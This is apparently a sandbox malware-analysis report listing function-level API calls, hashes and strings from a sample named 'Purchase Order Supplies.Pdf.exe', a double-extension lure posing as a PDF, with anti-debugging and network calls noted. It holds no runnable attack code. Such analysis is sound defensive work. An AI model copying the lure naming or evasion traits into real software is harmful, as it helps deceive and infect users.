                          • Instruction ID: cdd991913f6fc02c0386dc497f4ed69f22735e03fd2ba22d05116ae1e4c16521
                          • Opcode Fuzzy Hash: fe941ea6d52b53551b5e8848736f35b779def869a53f429d5f1278c159ab3504
                          • Instruction Fuzzy Hash: CF2168B5504794AFEB3297248C5DFEBBBEC9B05308F08408DEA9E97281C7745A85C761
                          APIs
                            • Part of subcall function 00CAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF282
                            • Part of subcall function 00CAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF2A6
                          • gethostbyname.WS2_32(?), ref: 00CE92F0
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE92FB
                          • _memmove.LIBCMT ref: 00CE9328
                          • inet_ntoa.WS2_32(?), ref: 00CE9333
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                          • String ID:
                          • API String ID: 1504782959-0
                          • Opcode ID: e6b4f807865d11c95476775d84d7e2f1cd830bc506f58804838d20c47b1240a7
                          • Instruction ID: e4eb9aa4abb53eafb3c8c29020fd42495f7f2c1e0fa5a1f0f944de1406ff0f86
                          • Opcode Fuzzy Hash: e6b4f807865d11c95476775d84d7e2f1cd830bc506f58804838d20c47b1240a7
                          • Instruction Fuzzy Hash: 5D115E76600109AFCF04FBA1CD5ADEE77B9EF183147104055F506A72A2DF30AE05EB61
                          APIs
                            • Part of subcall function 00CB45EC: __FF_MSGBANNER.LIBCMT ref: 00CB4603
                            • Part of subcall function 00CB45EC: __NMSG_WRITE.LIBCMT ref: 00CB460A
                            • Part of subcall function 00CB45EC: RtlAllocateHeap.NTDLL(01350000,00000000,00000001), ref: 00CB462F
                          • std::exception::exception.LIBCMT ref: 00CB013E
                          • __CxxThrowException@8.LIBCMT ref: 00CB0153
                            • Part of subcall function 00CB7495: RaiseException.KERNEL32(?,?,00C9125D,00D46598,?,?,?,00CB0158,00C9125D,00D46598,?,00000001), ref: 00CB74E6
                          Strings
                          Similarity
                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                          • String ID: bad allocation
                          • API String ID: 3902256705-2104205924
                          • Opcode ID: aa488b650742c613b2836f7d915e238149ea543c39c282c80c882aefd7cd6ed5
                          • Instruction ID: 45cfbf1f4b8c157566b0940df674cdeed598a7d351b292972dd4d9e01449b0c2
                          • Opcode Fuzzy Hash: aa488b650742c613b2836f7d915e238149ea543c39c282c80c882aefd7cd6ed5
                          • Instruction Fuzzy Hash: C3F0AF7514821EA6CB19EFACE8029EE7BE9AF04351F200416F90592192DFB0CA84A6B5
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          APIs
                          Similarity
                          • API ID: ClearVariant_memmove
                          • String ID:
                          • API String ID: 19560607-0
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00C9C00E,?,?,?,?,00000010), ref: 00C9C627
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00C9C65F
                          • _memmove.LIBCMT ref: 00C9C697
                          Similarity
                          • API ID: ByteCharMultiWide$_memmove
                          • String ID:
                          • API String ID: 3033907384-0
                          APIs
                          • SHGetMalloc.SHELL32(00C93C31), ref: 00C93A7D
                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00C93AD2
                          • SHGetDesktopFolder.SHELL32(?), ref: 00C93A8F
                            • Part of subcall function 00C93B1E: _wcsncpy.LIBCMT ref: 00C93B32
                          Similarity
                          • API ID: DesktopFolderFromListMallocPath_wcsncpy
                          • String ID:
                          • API String ID: 3981382179-0
                          APIs
                          • __FF_MSGBANNER.LIBCMT ref: 00CB4603
                            • Part of subcall function 00CB8E52: __NMSG_WRITE.LIBCMT ref: 00CB8E79
                            • Part of subcall function 00CB8E52: __NMSG_WRITE.LIBCMT ref: 00CB8E83
                          • __NMSG_WRITE.LIBCMT ref: 00CB460A
                            • Part of subcall function 00CB8EB2: GetModuleFileNameW.KERNEL32(00000000,00D50312,00000104,?,00000001,00CB0127), ref: 00CB8F44
                            • Part of subcall function 00CB8EB2: ___crtMessageBoxW.LIBCMT ref: 00CB8FF2
                            • Part of subcall function 00CB1D65: ___crtCorExitProcess.LIBCMT ref: 00CB1D6B
                            • Part of subcall function 00CB1D65: ExitProcess.KERNEL32 ref: 00CB1D74
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          • RtlAllocateHeap.NTDLL(01350000,00000000,00000001), ref: 00CB462F
                          Similarity
                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                          • String ID:
                          • API String ID: 1372826849-0
                          APIs
                          • TranslateMessage.USER32(?), ref: 00C9E646
                          • DispatchMessageW.USER32(?), ref: 00C9E651
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9E664
                          Similarity
                          • API ID: Message$DispatchPeekTranslate
                          • String ID:
                          • API String ID: 4217535847-0
                          APIs
                          • _free.LIBCMT ref: 00CDC45E
                            • Part of subcall function 00CB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00CB8715,00000000,00CB88A3,00CB4673,?), ref: 00CB28DE
                            • Part of subcall function 00CB28CA: GetLastError.KERNEL32(00000000,?,00CB8715,00000000,00CB88A3,00CB4673,?), ref: 00CB28F0
                          • _free.LIBCMT ref: 00CDC46F
                          • _free.LIBCMT ref: 00CDC481
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          Strings
                          Similarity
                          • API ID:
                          • String ID: CALL
                          • API String ID: 0-4196123274
                          APIs
                            • Part of subcall function 00C916F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00C91751
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C9159B
                          • CoInitialize.OLE32(00000000), ref: 00C91612
                          • CloseHandle.KERNEL32(00000000), ref: 00D058F7
                          Similarity
                          • API ID: Handle$ClipboardCloseFormatInitializeRegister
                          • String ID:
                          • API String ID: 458326420-0
                          APIs
                          Strings
                          Similarity
                          • API ID: _memmove
                          • String ID: EA06
                          • API String ID: 4104443479-3962188686
                          APIs
                          Strings
                          Similarity
                          • API ID: _wcscmp
                          • String ID: 0.0.0.0
                          • API String ID: 856254489-3771769585
                          APIs
                          • _memset.LIBCMT ref: 00D03CF1
                            • Part of subcall function 00C931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C931DA
                            • Part of subcall function 00C93A67: SHGetMalloc.SHELL32(00C93C31), ref: 00C93A7D
                            • Part of subcall function 00C93A67: SHGetDesktopFolder.SHELL32(?), ref: 00C93A8F
                            • Part of subcall function 00C93A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00C93AD2
                            • Part of subcall function 00C93B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00D522E8,?), ref: 00C93B65
                          Strings
                          Similarity
                          • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                          • String ID: X
                          • API String ID: 2727075218-3081909835
                          Strings
                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00D034AA
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                          • API String ID: 1029625771-2684727018
                          APIs
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          APIs
                          • GetCursorPos.USER32(?), ref: 00CE8074
                          • GetForegroundWindow.USER32 ref: 00CE807A
                            • Part of subcall function 00CE6B19: GetWindowRect.USER32(?,?), ref: 00CE6B2C
                          Similarity
                          • API ID: Window$CursorForegroundRect
                          • String ID:
                          • API String ID: 1066937146-0
                          • Opcode ID: 82112a907b2a4e7f32442c32e92a58848755e4d3a0dfa7284293dc31aa0a8357
                          • Instruction ID: 2046b231f733325fa86f85e1d5ad489a165ebe95da413ebffdca2e8878e46862
                          • Opcode Fuzzy Hash: 82112a907b2a4e7f32442c32e92a58848755e4d3a0dfa7284293dc31aa0a8357
                          • Instruction Fuzzy Hash: 2E316376A00219AFDF00EFA5CC85AEEB7B8FF14314F10442AE956B7251DB34AE45DB90
                          APIs
                          • IsWindow.USER32(00000000), ref: 00D0DB31
                          • IsWindow.USER32(00000000), ref: 00D0DB6B
                            • Part of subcall function 00C91F04: GetForegroundWindow.USER32 ref: 00C91FBE
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$Foreground
                          • String ID:
                          • API String ID: 62970417-0
                          • Opcode ID: 657f82d6d889a3665f4da48dd0af6f40279e60f316d3353b9b3969926de743f5
                          • Instruction ID: b5de2529aad54ca13e1c1453250508e5fff580f90734a3d1ed8c10e89f60f93c
                          • Opcode Fuzzy Hash: 657f82d6d889a3665f4da48dd0af6f40279e60f316d3353b9b3969926de743f5
                          • Instruction Fuzzy Hash: B121C072600206AADF10AF74C849FFE77AA9F40784F054429F95AD7181DB30EE01E760
                          APIs
                            • Part of subcall function 00C9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C91952
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CCE344
                          • _strlen.LIBCMT ref: 00CCE34F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout_strlen
                          • String ID:
                          • API String ID: 2777139624-0
                          • Opcode ID: bd614c9bf4382a16622149d49487b7379128610ede024777a387011d99122f74
                          • Instruction ID: 8b7260296ee9bdc2f1ca9336a3a522771beab298bf5e8f0554b9fe9626e3dabc
                          • Opcode Fuzzy Hash: bd614c9bf4382a16622149d49487b7379128610ede024777a387011d99122f74
                          • Instruction Fuzzy Hash: 0B11E73120020467CF04BB69DC86EBF7BA89F46340F00443EF606DB1A2DE64A946A7A0
                          APIs
                          • 7479C8D0.UXTHEME ref: 00C936E6
                            • Part of subcall function 00CB2025: __lock.LIBCMT ref: 00CB202B
                            • Part of subcall function 00C932DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C932F6
                            • Part of subcall function 00C932DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C9330B
                            • Part of subcall function 00C9374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00C9376D
                            • Part of subcall function 00C9374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00C9377F
                            • Part of subcall function 00C9374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00000104,?,00D51120,C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00D51124,?,?), ref: 00C937EE
                            • Part of subcall function 00C9374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00C93860
                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00C93726
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InfoParametersSystem$CurrentDirectory$7479DebuggerFullNamePathPresent__lock
                          • String ID:
                          • API String ID: 1760729031-0
                          • Opcode ID: 5e7595e536b4c8162d9f9c2a87125faec5c73c9b43990432b073c31946a46679
                          • Instruction ID: 185ab5542905e16f62ac5b0419d9c353f81330658e0c4f87a5de49fb53324187
                          • Opcode Fuzzy Hash: 5e7595e536b4c8162d9f9c2a87125faec5c73c9b43990432b073c31946a46679
                          • Instruction Fuzzy Hash: 9711CD719083419BC300EF69EC09A1EBBE9FB95711F00491EF884C73B1DB709A44CBA2
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00C94C2B,?,?,?,?,00C9BE63), ref: 00C94BB6
                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00C94C2B,?,?,?,?,00C9BE63), ref: 00D04972
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 8c32b9011ce0ea0b8672b8ae5ffe2ab785c579010dac196d3d95199d92b1977d
                          • Instruction ID: 08f3812efd8282d00acb4606fe0332a1dabe474490563706d40bcdbfdd7b82c3
                          • Opcode Fuzzy Hash: 8c32b9011ce0ea0b8672b8ae5ffe2ab785c579010dac196d3d95199d92b1977d
                          • Instruction Fuzzy Hash: 6C019270284308BFF7284E28DC8AF667BDCEB15768F108319BAE45A1E0C6B05D468B60
                          APIs
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF282
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF2A6
                            • Part of subcall function 00CAF2D0: _memmove.LIBCMT ref: 00CAF307
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$_memmove
                          • String ID:
                          • API String ID: 3033907384-0
                          • Opcode ID: a7c7bdcf5dbc88731ca7519926e4516915a8c4d12e2143e7658b47f2b8ea7ab6
                          • Instruction ID: 7a913a66b176fe9bf0ffaed042f91d38e95368302e416df117d97f188873aad5
                          • Opcode Fuzzy Hash: a7c7bdcf5dbc88731ca7519926e4516915a8c4d12e2143e7658b47f2b8ea7ab6
                          • Instruction Fuzzy Hash: 4FF04FB6104214BFAB14AFA5DC44DBB7FADEF8A360710812AFD08CA111DA31DD429671
                          APIs
                          • ___lock_fhandle.LIBCMT ref: 00CBF7D9
                          • __close_nolock.LIBCMT ref: 00CBF7F2
                            • Part of subcall function 00CB886A: __getptd_noexit.LIBCMT ref: 00CB886A
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                          • String ID:
                          • API String ID: 1046115767-0
                          • Opcode ID: efea79a7877eae49a04b6e666a84720c662e191060ce2f5121dd4c4b765a8899
                          • Instruction ID: 2f529e554e1b921d51bdff68b5711787447c4166dfa1816538f6350c46012ea2
                          • Opcode Fuzzy Hash: efea79a7877eae49a04b6e666a84720c662e191060ce2f5121dd4c4b765a8899
                          • Instruction Fuzzy Hash: B21170328056109FD7117F649C463D87B546F42331F550368E8706B3E3CBB55942EAA1
                          APIs
                          • send.WS2_32(00000000,?,00000000,00000000), ref: 00CE9534
                          • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00CE9557
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorLastsend
                          • String ID:
                          • API String ID: 1802528911-0
                          • Opcode ID: f3714da77adcdd3f42d217bc43a25a5bf9d97fddacea72b666f5515d072df8af
                          • Instruction ID: fa2a96d9123edd420002b3135b241288cd601c66f78e276679b60d05a8de542d
                          • Opcode Fuzzy Hash: f3714da77adcdd3f42d217bc43a25a5bf9d97fddacea72b666f5515d072df8af
                          • Instruction Fuzzy Hash: F8018F35300200AFC710EF29C891B6AB7E9EF99720F11852EE65AC7391CB70EC01CB60
                          APIs
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          • __lock_file.LIBCMT ref: 00CB42B9
                            • Part of subcall function 00CB5A9F: __lock.LIBCMT ref: 00CB5AC2
                          • __fclose_nolock.LIBCMT ref: 00CB42C4
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                          • String ID:
                          • API String ID: 2800547568-0
                          • Opcode ID: 340e31cead5e9a969493ec3b3f30908a8c26829c03d4bdf76bb6d8f51d5b9ec0
                          • Instruction ID: 8251f2222c6f3349cba78d2c8d8d0c0a22219e8a5655b64f1f99e19777e070fe
                          • Opcode Fuzzy Hash: 340e31cead5e9a969493ec3b3f30908a8c26829c03d4bdf76bb6d8f51d5b9ec0
                          • Instruction Fuzzy Hash: 35F0B4318097159ADB15AB7588027EE67D0AF81334F228309F825AB1C3CB7C8A01BB52
                          APIs
                          • timeGetTime.WINMM ref: 00CAF57A
                            • Part of subcall function 00C9E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9E279
                          • Sleep.KERNEL32(00000000), ref: 00D075D3
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessagePeekSleepTimetime
                          • String ID:
                          • API String ID: 1792118007-0
                          • Opcode ID: 4563e67b64200a964b60e99af2099efbfb9a0b2a0275619a2412b7ddafd2f6f9
                          • Instruction ID: 7805b5c90048f2e4d4ec760597587e7f89b5b8552185c073664a58ab53e73d4c
                          • Opcode Fuzzy Hash: 4563e67b64200a964b60e99af2099efbfb9a0b2a0275619a2412b7ddafd2f6f9
                          • Instruction Fuzzy Hash: 79F08C71240719AFD314EF69D849B96BBE9EF68320F00442AF81AC7391DF70A800CBE0
                          APIs
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • __wcsnicmp.LIBCMT ref: 00C983C4
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __itow__swprintf__wcsnicmp
                          • String ID:
                          • API String ID: 712828618-0
                          • Opcode ID: 8ab493cf396f586e988fbb2cd5b1780cf546e8ed0e37217accfc2a0838a8d3ce
                          • Instruction ID: 5a4deaf434f4324aa7b8a28f4ae7814bbf251dda08a0a62e11d17b9925c3f64e
                          • Opcode Fuzzy Hash: 8ab493cf396f586e988fbb2cd5b1780cf546e8ed0e37217accfc2a0838a8d3ce
                          • Instruction Fuzzy Hash: C3F19E71508302AFCB04DF18C89586FBBE5FF99304F54891DF98A97261EB30EA09DB52
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca55a8790d7cd0e5e7960c90d9e329dd0bff79563238d8607ea337c53e4f0b64
                          • Instruction ID: 6605c1384fa817319061f497b0f0744c5cd077634eff09989afc320d802af2d6
                          • Opcode Fuzzy Hash: ca55a8790d7cd0e5e7960c90d9e329dd0bff79563238d8607ea337c53e4f0b64
                          • Instruction Fuzzy Hash: 0061B4B0A002079FCB04DF55C880A7EB7E4FF55318F148669EA2A8B291E770ED95DB91
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62be54aff8397159c8942ebe69c08661c0b1fccbb7d02c8891a89aa6d47f70e3
                          • Instruction ID: 897d7038e67338fb82c70b1c208caed969432b84515cccaded26a2475eea8800
                          • Opcode Fuzzy Hash: 62be54aff8397159c8942ebe69c08661c0b1fccbb7d02c8891a89aa6d47f70e3
                          • Instruction Fuzzy Hash: 4751B435700115AFCF04EFA8C995EAD77EAAF49314B1441A9F50A9B392DB30ED05EB90
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
